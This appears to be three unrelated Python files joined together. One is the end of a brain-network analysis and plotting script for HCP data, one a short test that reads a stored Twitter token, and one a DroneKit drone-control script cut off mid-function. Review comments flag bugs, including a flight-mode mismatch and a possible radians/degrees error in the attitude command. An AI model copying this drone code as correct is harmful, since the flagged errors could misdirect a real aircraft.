    plot_pc_coef_values = subject_pcs[np.argsort(task_perf)[np.linspace(0,task_perf.shape[0]-1,30).astype(int)]][:,np.argsort(task_pc_corr)[np.linspace(0,task_pc_corr.shape[0]-1,10).astype(int)]].transpose()
    plot_task_perf = task_perf[np.argsort(task_perf)[np.linspace(0,task_perf.shape[0]-1,30).astype(int)]]
    # sns.heatmap([plot_task_perf,plot_task_perf],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),ax=axes[1],cbar=False)
    arr1 = plot_pc_coef_values
    arr2 = [plot_task_perf,]
    fig, axes = plt.subplots(2, 2,gridspec_kw={'height_ratios': [10,1,10,1], 'width_ratios': [10, .5,], 'wspace': 0.25}, sharex='col')
    # h1=sns.heatmap(arr1, ax=axes[0][0], cbar_ax=axes[0][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
    h1=sns.heatmap(arr1, ax=axes[0][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
    h1.set_xlabel("subjects' participation coefficients")
    h1.set_ylabel('nodes')
    h1.set_yticklabels(h1.get_yticklabels(),rotation=360)
    h1.set_xticks([],[])
    # h2=sns.heatmap(arr2, ax=axes[1][0], cbar_ax=axes[1][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
    h2=sns.heatmap(arr2, ax=axes[1][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
    h2.set_xlabel("subjects' working memory performance")
    h2.set_yticks([],[])
    h2.set_xticks([],[])
    # plt.savefig('task_perf_corr_exp.pdf')
    plot_coefs = task_pc_corr[np.argsort(task_pc_corr)[np.linspace(0,task_pc_corr.shape[0]-1,10).astype(int)]]
    h3= sns.heatmap(plot_coefs.reshape(10,1),annot=True, fmt='.2f',ax=axes[0][1],cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True))
    # h3.set_xlabel("subjects' participation coefficients")
    h3.set_ylabel('diversity facilitated\nperformance coefficient')
    h3.set_yticklabels(h1.get_yticklabels(),rotation=360)
    h3.set_xticks([],[])
    axes[1][1].set_visible(False)
    plt.savefig('task_perf_corr_exp.pdf')
    plt.show()
    """
    y = subjects
    x = pc
    lower x = dfpc
    colorbar = features
    """
    # Figure 3: the per-subject diversity feature used by the model.
    sns.set(style='white',context="paper",font='Helvetica')
    plot_pc_coef_values = subject_pcs[np.argsort(task_pc)[np.linspace(0,task_pc.shape[0]-1,30).astype(int)]][:,np.argsort(task_pc_corr)[np.linspace(0,task_pc_corr.shape[0]-1,10).astype(int)]].transpose()
    plot_task_perf = task_pc[np.argsort(task_pc)[np.linspace(0,task_pc.shape[0]-1,30).astype(int)]]
    arr1 = plot_pc_coef_values
    arr2 = [plot_task_perf,]
    fig, axes = plt.subplots(2, 2,gridspec_kw={'height_ratios': [10,1,10,1], 'width_ratios': [10, .5,], 'wspace': 0.25}, sharex='col')
    # h1=sns.heatmap(arr1, ax=axes[0][0], cbar_ax=axes[0][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
    h1=sns.heatmap(arr1, ax=axes[0][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
    h1.set_xlabel("nodes' participation coefficients")
    h1.set_ylabel('subjects')
    h1.set_yticklabels(h1.get_yticklabels(),rotation=360)
    h1.set_xticks([],[])
    # h2=sns.heatmap(arr2, ax=axes[1][0], cbar_ax=axes[1][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
    h2=sns.heatmap(arr2, ax=axes[1][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
    h2.set_xlabel("nodes' diversity facilitated performance coefficients")
    h2.set_yticks([],[])
    h2.set_xticks([],[])
    # plt.savefig('task_perf_corr_exp.pdf')
    plot_coefs = task_pc[np.argsort(task_pc)[np.linspace(0,task_pc.shape[0]-1,10).astype(int)]]
    h3= sns.heatmap(plot_coefs.reshape(10,1),annot=True, fmt='.2f',ax=axes[0][1],cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True))
    # h3.set_xlabel("subjects' participation coefficients")
    h3.set_ylabel('diversity feature for model')
    h3.set_yticklabels(h1.get_yticklabels(),rotation=360)
    h3.set_xticks([],[])
    axes[1][1].set_visible(False)
    plt.savefig('feature_exp.pdf')
    plt.show()
    # Re-derive the model features for a single held-out subject (t = 0),
    # mirroring what super_edge_predict_new computes per fold.
    t = 0
    return_features = True
    use_matrix = True
    task_matrices = matrices
    fit_mask = np.ones((subject_pcs.shape[0])).astype(bool)
    fit_mask[t] = False
    if use_matrix == True:
        # Edge features: correlate each flattened lower-triangle matrix with
        # the performance-edge correlation map (task and rest separately).
        flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
        for s in range(subject_pcs.shape[0]):
            m = task_matrices[s]
            flat_matrices[s] = m[np.tril_indices(264,-1)]
        perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
        perf_edge_scores = np.zeros((subject_pcs.shape[0]))
        for s in range(subject_pcs.shape[0]):
            perf_edge_scores[s] = pearsonr(flat_matrices[s],perf_edge_corr)[0]
        flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
        for s in range(subject_pcs.shape[0]):
            m = rest_matrices[s]
            flat_matrices[s] = m[np.tril_indices(264,-1)]
        rest_perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
        rest_perf_edge_scores = np.zeros((subject_pcs.shape[0]))
        for s in range(subject_pcs.shape[0]):
            rest_perf_edge_scores[s] = pearsonr(flat_matrices[s],rest_perf_edge_corr)[0]
    # Nodal coefficient maps fit on the training subjects only (fit_mask).
    perf_pc_corr = np.zeros(subject_pcs.shape[1])
    for i in range(subject_pcs.shape[1]):
        perf_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_pcs[fit_mask,i])[0]
    perf_wmd_corr = np.zeros(subject_wmds.shape[1])
    for i in range(subject_wmds.shape[1]):
        perf_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_wmds[fit_mask,i])[0]
    mod_pc_corr = np.zeros(subject_pcs.shape[1])
    for i in range(subject_pcs.shape[1]):
        mod_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_pcs[fit_mask,i])[0]
    mod_wmd_corr = np.zeros(subject_wmds.shape[1])
    for i in range(subject_wmds.shape[1]):
        mod_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_wmds[fit_mask,i])[0]
    # Per-subject similarity of each nodal profile to its coefficient map.
    task_pc = np.zeros(subject_pcs.shape[0])
    task_wmd = np.zeros(subject_pcs.shape[0])
    for s in range(subject_pcs.shape[0]):
        task_pc[s] = nan_pearsonr(subject_pcs[s],perf_pc_corr)[0]
        task_wmd[s] = nan_pearsonr(subject_wmds[s],perf_wmd_corr)[0]
    rest_pc = np.zeros(subject_pcs.shape[0])
    rest_wmd = np.zeros(subject_pcs.shape[0])
    for s in range(subject_pcs.shape[0]):
        rest_pc[s] = nan_pearsonr(rest_subject_pcs[s],mod_pc_corr)[0]
        rest_wmd[s] = nan_pearsonr(rest_subject_wmds[s],mod_wmd_corr)[0]
    # Assemble the feature matrix (8 features with matrices, 6 without).
    if use_matrix == True:
        pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_perf_edge_scores,perf_edge_scores,rest_subject_mods,subject_mods]).transpose()
        # neurons = (8,8,8,)
        neurons = (8,12,8,12)
    elif use_matrix == False:
        pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_subject_mods,subject_mods]).transpose()
        # neurons = (6,6,6,)
        neurons = (6,9,6,9)
    # Fit the MLP on all subjects except t, then predict subject t.
    train = np.ones(len(pvals)).astype(bool)
    train[t] = False
    model = MLPRegressor(solver='lbfgs',hidden_layer_sizes=neurons,alpha=1e-5,random_state=t)
    model.fit(pvals[train],task_perf[train])
    result = model.predict(pvals[t].reshape(1, -1))[0]
    # Export the trained network's weights as a layered igraph for plotting.
    import igraph
    model_array = np.array(model.coefs_)
    n_nodes = np.sum(neurons)
    model_network = np.zeros((n_nodes,n_nodes))
    g = igraph.Graph()
    vertex = 0
    # model_array[model_array<0] = 0.0
    # Layer sizes: input (8) plus the four hidden layers; 'pos' offsets are
    # only used as layout coordinates in the exported graph.
    neurons = [8,8,12,8,12]
    pos = [-4,-4,-6,-4,-6]
    for l in range(5):
        for n in range(neurons[l]):
            g.add_vertex(vertex,**{'layer':l,'neuron':n+pos[l]})
            vertex = vertex + 1
    # Single output vertex in its own layer.
    g.add_vertex(vertex+1,**{'layer':l+1,'neuron':3})
    # Edges between consecutive layers, weighted by |coef| and tagged with sign.
    for l in range(4):
        i_off = int(np.sum(neurons[:l]))
        j_off = int(np.sum(neurons[:l+1]))
        print i_off,j_off
        for i in range(neurons[l]):
            for j in range(neurons[l+1]):
                if model_array[l][i,j] > 0: d = 'pos'
                else: d = 'neg'
                g.add_edge(int(i+i_off),int(j+j_off),weight=abs(model_array[l][i,j]),**{'direction':d})
    # Edges from the last hidden layer (12 units) to the output vertex.
    for i in range(12):
        if model.coefs_[-1][i] > 0: d = 'pos'
        else: d = 'neg'
        g.add_edge(i+36,48,weight=abs(model.coefs_[-1][i]),**{'direction':d})
    g.write_gml('neural_network_new.gml')
def plot(df,savestr,colormap='coolwarm'):
    """
    Render a four-column text 'heatmap' of prediction accuracies: one column
    per task, one colored text line per behavioral measure (sorted by
    accuracy, score appended in parentheses, '*' when p survives Bonferroni),
    saved to '<savestr>.pdf'.

    df must have columns 'Task', 'Behavioral Measure', 'Prediction Accuracy'
    and 'p' (as written by performance_across_traits).
    """
    behavior_df = df
    tasks = np.unique(behavior_df.Task.values)
    behavior_df['Prediction Accuracy'] = behavior_df['Prediction Accuracy'].values.astype(float)
    # Raw-accuracy colors (fixed -.3..3 scale) for the per-task columns.
    behavior_df['colors'] = make_heatmap(behavior_df['Prediction Accuracy'].values,colormap,-.3,.3)
    # Z-score accuracies within task, then within measure, for the color scale.
    # NOTE(review): these chained-indexing assignments rely on pandas writing
    # through a view (SettingWithCopy territory) -- verify on newer pandas.
    norm_behavior_df = behavior_df.copy()
    for task in behavior_df['Task'].values:
        norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Task']==task] = scipy.stats.zscore(norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Task']==task].values)
    for measure in behavior_df['Behavioral Measure'].values:
        norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Behavioral Measure']==measure] = scipy.stats.zscore(norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Behavioral Measure']==measure].values)
    norm_behavior_df['colors'] = make_heatmap(norm_behavior_df['Prediction Accuracy'].values,colormap,-1.5,1.5)
    # Figure-relative coordinates; text occupies the lower half (top/2).
    left, width = 0, 1
    bottom, height = 0, 1
    right = left + width
    top = bottom + height
    top = top /2.
    fig = plt.figure(figsize=(mm_2_inches(183),mm_2_inches(247)))
    for col,task in zip(np.linspace(.135,.865,4),tasks):
        # Measures, scores and p values for this task, sorted by accuracy.
        order = behavior_df[behavior_df.Task==task]['Behavioral Measure'].values[np.argsort(behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values)]
        scores = behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values[np.argsort(behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values)]
        pvals = behavior_df[behavior_df.Task==task]['p'].values[np.argsort(behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values)].astype(float)
        # Append the (string-truncated) score to each measure's label.
        for ix,o in enumerate(order):
            if float(scores[ix]) < 0.0:
                s = '-' + str(scores[ix])[1:5]
                order[ix] = order[ix] + ' (%s)'%(s)
                continue
            s = str(scores[ix])[1:4]
            order[ix] = order[ix] + ' (%s)'%(s)
        # Task name goes last (topmost line), in black.
        order = np.append(order,task.capitalize())
        colors = norm_behavior_df[norm_behavior_df.Task==task]['colors'].values[np.argsort(norm_behavior_df[norm_behavior_df.Task==task]['Prediction Accuracy'].values)]
        # colors = norm_behavior_df[norm_behavior_df.Task==task]['colors'].values[np.argsort(norm_behavior_df[norm_behavior_df.Task==task]['Prediction Accuracy'].values)]
        colors = list(colors)
        colors.append((0,0,0))
        pvals = np.append(pvals,1)
        # Evenly spaced vertical positions for the labels in this column.
        locs = (np.arange(len(order)+1)/float(len(order)+1))[1:]
        for i,t,c,p in zip(locs,order,colors,pvals):
            if t == 'Wm': t = 'Working Memory'
            # '*' marks Bonferroni-corrected significance.
            if p < (.05 / len(colors)):
                t = t + " *"
            fig.text(col*(left+right), float(i)*(bottom+top), t,horizontalalignment='center',verticalalignment='center',fontsize=7, color=c)
    sns.plt.savefig('%s.pdf'%(savestr))
    sns.plt.show()
def small_tstatfunc(x, y, bc=False):
    """Format an independent-samples t-test as a compact annotation string.

    Parameters
    ----------
    x, y : array-like
        The two samples to compare.
    bc : bool
        Unused; presumably a Bonferroni-correction switch that was never
        wired up -- kept for interface compatibility (TODO confirm).

    Returns
    -------
    str
        The t statistic rounded to 3 decimals; when p < .05 the raw p value
        is appended on a second line.
    """
    t, p = scipy.stats.ttest_ind(x, y)
    # Significance marker; '*!' flags a very small p value.
    if p < 1e-5:
        pst = '*!'
    elif p < .05:
        pst = '*'
    else:
        pst = None
    # NOTE(review): `pst` is computed but the significant branch formats the
    # raw p value instead of the marker -- confirm which was intended.
    if pst is None:  # idiom fix: `is None` rather than `== None`
        return "%s" % (np.around(t, 3))
    else:
        return "%s \n p%s" % (np.around(t, 3), p)
def plot_box(data,x,y,split_names,savestr,colors):
    """Split nodes into hub/non-hub groups per task and draw a grouped boxplot.

    For each task, nodes at or above the 80th percentile of column `x` are
    labeled split_names[0], the rest split_names[1]; column `y` is then
    compared between the two groups (t-test printed per task) and the figure
    is saved to `savestr`.

    Python 2 / legacy-seaborn code (uses `sns.plt` and chained assignment);
    left byte-identical.
    """
    data['Node Type'] = np.zeros(len(data)).astype(str)
    data.Task = data.Task.str.capitalize()
    for task in data.Task.values:
        metric= data[x][data.Task==task].values
        # 80th percentile of the split metric defines "hub" membership.
        cut_off = np.percentile(metric,80)
        c = np.zeros(len(metric)).astype(str)
        c[metric >= cut_off] = split_names[0]
        c[metric < cut_off] = split_names[1]
        # NOTE(review): chained assignment -- relies on pandas writing through
        # to the original frame; emits SettingWithCopyWarning on modern pandas.
        data['Node Type'][data.Task==task] = c
    sns.set(context="paper",font='Helvetica',style="white",font_scale=1.5)
    ax = sns.boxplot(data=data,x='Task',y=y,hue='Node Type',hue_order=split_names,palette=colors)
    # Print a hub-vs-other t statistic for each task.
    for t in np.unique(data.Task.values):
        tdf = data[data.Task==t]
        print t, scipy.stats.ttest_ind(tdf[y][tdf['Node Type']==split_names[0]].values,tdf[y][tdf['Node Type']==split_names[1]].values)
        # maxvaly = np.mean(tdf[y]) + (np.std(tdf[y]) * .5)
        # sns.plt.text(i,maxvaly,stat,ha='center',color='black',fontsize=sns.plotting_context()['font.size'])
    sns.plt.tight_layout()
    sns.plt.savefig(savestr)
    sns.plt.close()
# performance_across_tasks()
# connectivity_across_tasks()
# plot(pd.read_csv('/home/despoB/mb3152/dynamic_mod/feature_behav_predict.csv'),'feature_behav_predict','Reds')
# plot(pd.read_csv('/home/despoB/mb3152/dynamic_mod/feature_corr.csv'),'feature_corr','RdBu_r')
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False,use_matrix=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True,use_matrix=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False,use_matrix=False)
# performance_across_traits(tasks = [str(sys.argv[1])])
# performance_across_traits(tasks = ['RELATIONAL'])
# Aggregate the per-task feature/behavior correlation CSVs into one frame.
df = pd.DataFrame()
for task in ['WM','RELATIONAL','LANGUAGE','SOCIAL']:
    # Columns 1-4 only; column 0 is presumably an unnamed index -- TODO confirm.
    # NOTE(review): DataFrame.append was removed in pandas 2.0; fine for the
    # legacy pandas this script targets.
    df = df.append(pd.read_csv('feature_corr_%s.csv'%(task),usecols=[1,2,3,4]))
# qsub -pe threaded 20 -binding linear:20 -V -l mem_free=20G -j y -o /home/despoB/mb3152/dynamic_mod/sge/ -e /home/despoB/mb3152/dynamic_mod/sge/ -N 'pred' hcp_perf2.py
"""
PRETTY FIGURES
"""
# loo_df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/loo_df.csv')
# df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/df.csv')
# plot_results(loo_df,'Predicted Performance','Performance','/home/despoB/mb3152/dynamic_mod/figures/Predicted_Performance_%s_%s.pdf'%(run_version,control_motion))
# plot_results(df,'PCxPerformance','PC','/home/despoB/mb3152/dynamic_mod/figures/PC_PC_Performance.pdf')
# plot_results(df,'PCxPerformance','PCxModularity','/home/despoB/mb3152/dynamic_mod/figures/PC_Modularity_PC_Performance.pdf')
# plot_results(df,'WCDxPerformance','WCD','/home/despoB/mb3152/dynamic_mod/figures/WCD_WCD_Performance.pdf')
# plot_results(df,'WCDxPerformance','WCDxModularity','/home/despoB/mb3152/dynamic_mod/figures/WCD_Modularity_PC_Performance.pdf')
# pc_df,wmd_df = connectivity_across_tasks(atlas='power',project='hcp',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz_wc',control_com=False,control_motion=False)
# pc_df['Mean Participation Coefficient'] = pc_df['Mean Participation Coefficient'].astype(float)
# pc_df['Diversity Facilitated Modularity Coefficient'] = pc_df['Diversity Facilitated Modularity Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([6,7])]
# plot_box(pc_df,'Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient',['Connector Hub','Other Node'],savestr='dfmc_cutoff.pdf',colors=colors)
# wmd_df['Mean Within-Community-Strength'] = wmd_df['Mean Within-Community-Strength'].astype(float)
# wmd_df['Locality Facilitated Modularity Coefficient'] = wmd_df['Locality Facilitated Modularity Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([5,7])]
# plot_box(wmd_df,'Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient',['Local Hub','Other Node'],savestr='lfmc_cutoff.pdf',colors=colors)
# pc_df,wmd_df = performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=True,return_df=True)
# pc_df['Mean Participation Coefficient'] = pc_df['Mean Participation Coefficient'].astype(float)
# pc_df['Diversity Facilitated Performance Coefficient'] = pc_df['Diversity Facilitated Performance Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([6,7])]
# plot_box(pc_df,'Mean Participation Coefficient','Diversity Facilitated Performance Coefficient',['Connector Hub','Other Node'],savestr='dfpc_cutoff.pdf',colors=colors)
# wmd_df['Mean Within-Community-Strength'] = wmd_df['Mean Within-Community-Strength'].astype(float)
# wmd_df['Locality Facilitated Performance Coefficient'] = wmd_df['Locality Facilitated Performance Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([5,7])]
# plot_box(wmd_df,'Mean Within-Community-Strength','Locality Facilitated Performance Coefficient',['Local Hub','Other Node'],savestr='lfpc_cutoff.pdf',colors=colors)
# plot_connectivity_results(pc_df,'Diversity Facilitated Modularity Coefficient','Mean Participation Coefficient','/home/despoB/mb3152/dynamic_mod/figures/pc_pc_w_c.pdf')
# wmd_df['Mean Within-Community-Strength'] = wmd_df['Mean Within-Community-Strength'].astype(float)
# wmd_df['Locality Facilitated Modularity Coefficient'] = wmd_df['Locality Facilitated Modularity Coefficient'].astype(float)
# plot_connectivity_results(wmd_df,'Locality Facilitated Modularity Coefficient','Mean Within-Community-Strength','/home/despoB/mb3152/dynamic_mod/figures/wmd_wmd_q_c.pdf')
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False)
# performance_across_tasks()
# performance_across_traits()
# if len(sys.argv) > 1:
# if sys.argv[1] == 'perf':
# performance_across_tasks()
# if sys.argv[1] == 'forever':
# a = 0
# while True:
# a = a - 1
# a = a + 1
# if sys.argv[1] == 'pc_edge_corr':
# task = sys.argv[2]
# atlas = 'power'
# subjects = np.array(hcp_subjects).copy()
# subjects = list(subjects)
# subjects = remove_missing_subjects(subjects,task,atlas)
# static_results = graph_metrics(subjects,task,atlas)
# subject_pcs = static_results['subject_pcs']
# matrices = static_results['matrices']
# pc_edge_corr = pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/hcp_%s_power_pc_edge_corr_z.npy' %(task))
# if sys.argv[1] == 'graph_metrics':
# # subjects = remove_missing_subjects(list(np.array(hcp_subjects).copy()),sys.argv[2],sys.argv[3])
# # subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',sys.argv[2],sys.argv[3]))
# # graph_metrics(subjects,task=sys.argv[2],atlas=sys.argv[3],run_version='fz_wc',run=True)
# subjects = []
# dirs = os.listdir('/home/despoB/connectome-data/')
# for s in dirs:
# try: int(s)
# except: continue
# subjects.append(str(s))
# graph_metrics(subjects,task=sys.argv[2],atlas=sys.argv[3],run_version='HCP_900',run=True)
# if sys.argv[1] == 'make_matrix':
# subject = str(sys.argv[2])
# task = str(sys.argv[3])
# atlas = str(sys.argv[4])
# make_static_matrix(subject,task,'hcp',atlas)
# if sys.argv[1] == 'calc_motion':
# subject = str(sys.argv[2])
# task = str(sys.argv[3])
# run_fd(subject,task)
# if sys.argv[1] == 'check_norm':
# atlas = sys.argv[3]
# task = sys.argv[2]
# # subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',sys.argv[2],sys.argv[3]))
# subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_scrub_.2.npy' %('hcp',sys.argv[2],sys.argv[3]))
# check_scrubbed_normalize(subjects,task,atlas='power')
# print 'done checkin, all good!'
# if sys.argv[1] == 'mediation':
# local_mediation(sys.argv[2])
# if sys.argv[1] == 'alg_compare':
# subjects = []
# dirs = os.listdir('/home/despoB/connectome-data/')
# for s in dirs:
# try: int(s)
# except: continue
# subjects.append(str(s))
# # alg_compare(subjects)
|
### Test for secrets.py
# Should return a non-empty secret token
def test_secrets():
    """The stored Twitter token should resolve to a non-empty string."""
    access_token = getSecret('twitter-rob')
    # Explicit comparison instead of relying on truthiness of the length.
    assert len(access_token) > 0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
######################################################
## Sending control commands to AP via MAVLink ##
## Based on set_attitude_target.py: https://github.com/dronekit/dronekit-python/blob/master/examples/set_attitude_target/set_attitude_target.py
######################################################
## Additional installation for SITL:
## pip3 install dronekit-sitl -UI
from dronekit import connect, VehicleMode, LocationGlobal, LocationGlobalRelative
from pymavlink import mavutil # Needed for command message definitions
import time
import math
# Set MAVLink protocol to 2.
import os
os.environ["MAVLINK20"] = "1"
import sys
#######################################
# Parameters
#######################################
# 0-based index into chan1_raw..chan8_raw used as the autonomy switch.
rc_control_channel = 6 # Channel to check value, start at 0 == chan1_raw
rc_control_thres = 2000 # PWM threshold; mission logic runs above this value
#######################################
# Global variables
#######################################
# Latest raw PWM seen on the control channel (updated by RC_CHANNEL_listener).
rc_channel_value = 0
vehicle = None  # assigned after connect() below
#######################################
# User input
#######################################
# Set up option parsing to get connection string
import argparse
parser = argparse.ArgumentParser(description='Example showing how to set and clear vehicle channel-override information.')
# --connect is optional; when omitted a local SITL instance is started below.
parser.add_argument('--connect',
                    help="vehicle connection target string. If not specified, SITL automatically started and used.")
args = parser.parse_args()
#######################################
# Functions
#######################################
connection_string = args.connect
sitl = None
# Start SITL (software-in-the-loop simulator) if no connection string specified
if not connection_string:
    import dronekit_sitl
    sitl = dronekit_sitl.start_default()
    connection_string = sitl.connection_string()
print('Connecting to vehicle on: %s' % connection_string)
# Blocks until vehicle parameters/attributes have been downloaded.
vehicle = connect(connection_string, wait_ready=True)
@vehicle.on_message('RC_CHANNELS')
def RC_CHANNEL_listener(vehicle, name, message):
    """RC_CHANNELS callback: cache the raw PWM value of the channel used as
    the autonomy switch (index rc_control_channel) into rc_channel_value."""
    global rc_channel_value, rc_control_channel
    # TO-DO: find a less hard-coded solution
    curr_channels_values = [message.chan1_raw, message.chan2_raw, message.chan3_raw, message.chan4_raw, message.chan5_raw, message.chan6_raw, message.chan7_raw, message.chan8_raw]
    rc_channel_value = curr_channels_values[rc_control_channel]
    # # Print out the values to debug
    # print('%s attribute is: %s' % (name, message)) # Print all info from the messages
    # os.system('clear') # This helps in displaying the messages to be more readable
    # for channel in range(8):
    #     print("Number of RC channels: ", message.chancount, ". Individual RC channel value:")
    #     print(" CH", channel, curr_channels_values[channel])
def arm_and_takeoff_nogps(aTargetAltitude):
    """
    Arms vehicle and fly to aTargetAltitude without GPS data.
    """
    print("Basic pre-arm checks")
    # Don't let the user try to arm until autopilot is ready
    # If you need to disable the arming check,
    # just comment it with your own responsibility.
    while not vehicle.is_armable:
        print("- Waiting for vehicle to initialise...")
        time.sleep(1)
    print("Arming motors")
    # Copter should arm in GUIDED_NOGPS mode
    # NOTE(review): the mode actually set here is LOITER, which contradicts
    # both the comment above and the function name -- confirm which is intended.
    vehicle.mode = VehicleMode("LOITER")
    vehicle.armed = True
    while not vehicle.armed:
        print("- Waiting for arming...")
        time.sleep(1)
    print("Taking off!")
    vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude
    # Wait until the vehicle reaches a safe height before processing the goto
    # (otherwise the command after Vehicle.simple_takeoff will execute
    # immediately).
    while True:
        print(" Altitude: ", vehicle.location.global_relative_frame.alt)
        # Break and return from function just below target altitude.
        if vehicle.location.global_relative_frame.alt >= aTargetAltitude * 0.95:
            print("Reached target altitude")
            break
        time.sleep(1)
def send_attitude_target(roll_angle = 0.0, pitch_angle = 0.0,
                         yaw_angle = None, yaw_rate = 0.0, use_yaw_rate = False,
                         thrust = 0.5):
    """
    Send one SET_ATTITUDE_TARGET MAVLink message.

    use_yaw_rate: the yaw can be controlled using yaw_angle OR yaw_rate.
                  When one is used, the other is ignored by Ardupilot.
    thrust: 0 <= thrust <= 1, as a fraction of maximum vertical thrust.
            Note that as of Copter 3.5, thrust = 0.5 triggers a special case in
            the code for maintaining current altitude.
    """
    if yaw_angle is None:
        # this value may be unused by the vehicle, depending on use_yaw_rate
        # NOTE(review): vehicle.attitude.yaw is in radians, while
        # to_quaternion() below treats its arguments as degrees -- confirm.
        yaw_angle = vehicle.attitude.yaw
    # Thrust >  0.5: Ascend
    # Thrust == 0.5: Hold the altitude
    # Thrust <  0.5: Descend
    msg = vehicle.message_factory.set_attitude_target_encode(
        0, # time_boot_ms
        1, # Target system
        1, # Target component
        # type_mask: bit 2 (0b100) set -> ignore the body yaw-rate field and
        # use the quaternion's yaw; all bits clear -> honour the yaw rate.
        0b00000000 if use_yaw_rate else 0b00000100,
        to_quaternion(roll_angle, pitch_angle, yaw_angle), # Quaternion
        0, # Body roll rate in radian
        0, # Body pitch rate in radian
        math.radians(yaw_rate), # Body yaw rate in radian/second
        thrust # Thrust
    )
    vehicle.send_mavlink(msg)
def send_ned_velocity(velocity_x, velocity_y, velocity_z, duration):
    """Command a constant NED-frame velocity for `duration` seconds.

    Builds a single SET_POSITION_TARGET_LOCAL_NED message with only the
    velocity fields enabled and re-sends it once per second, since the
    autopilot expects velocity setpoints to be refreshed.
    """
    # type_mask 0b0000111111000111 enables only the velocity entries;
    # position, acceleration and yaw fields are ignored by the autopilot.
    velocity_msg = vehicle.message_factory.set_position_target_local_ned_encode(
        0,                                    # time_boot_ms (not used)
        0, 0,                                 # target system, target component
        mavutil.mavlink.MAV_FRAME_LOCAL_NED,  # coordinate frame
        0b0000111111000111,                   # type_mask (only speeds enabled)
        0, 0, 0,                              # x, y, z positions (ignored)
        velocity_x, velocity_y, velocity_z,   # x, y, z velocity in m/s
        0, 0, 0,                              # accelerations (ignored)
        0, 0)                                 # yaw, yaw_rate (ignored)
    # Re-send the setpoint at 1 Hz for the requested duration.
    for _ in range(duration):
